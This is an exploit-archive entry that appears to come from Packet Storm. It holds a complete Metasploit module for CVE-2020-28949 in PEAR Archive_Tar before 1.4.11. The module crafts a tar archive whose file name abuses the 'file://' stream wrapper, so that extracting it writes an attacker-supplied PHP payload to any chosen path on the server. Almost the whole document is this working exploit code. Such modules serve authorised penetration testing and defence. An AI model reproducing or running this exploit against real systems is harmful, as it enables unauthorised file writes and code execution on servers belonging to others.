PEAR Archive_Tar Arbitrary File Write

2021-01-25T00:00:00
ID PACKETSTORM:161095
Type packetstorm
Reporter gwillcox-r7
Modified 2021-01-25T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'rex/tar'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'PEAR Archive_Tar < 1.4.11 Arbitrary File Write',  
'Description' => %q{  
This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file stream wrappers contained  
within filenames to write an arbitrary file containing user controlled content to an arbitrary file  
on disk. Note that the file will be written to disk with the permissions of the user that PHP is  
running as, so it may not be possible to overwrite some files if the PHP user is not appropriately  
privileged.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'gwillcox-r7', # Metasploit module  
'xorathustra', # Original advisory and PoC  
],  
'References' =>  
[  
['URL', 'https://github.com/pear/Archive_Tar/issues/33'],  
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'],  
['CVE', '2020-28949']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
'DisablePayloadHandler' => true  
},  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['Archive_Tar < 1.4.11', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => '2020-11-17'  
)  
)  
  
register_options([  
OptString.new('FILEPATH', [true, 'The full path to the file to write on the target.', '/tmp/msf.php'])  
])  
end  
  
def exploit  
# Create malicious tar archive  
tarfile = StringIO.new  
Rex::Tar::Writer.new tarfile do |tar|  
tar.add_file "file://#{datastore['FILEPATH']}", 0o644 do |io|  
io.write payload.encoded  
end  
end  
tarfile.rewind  
file_buffer = tarfile.read  
  
print_status "Writing file: #{datastore['FILENAME']} (#{file_buffer.length} bytes) ..."  
file_create file_buffer  
end  
end  
`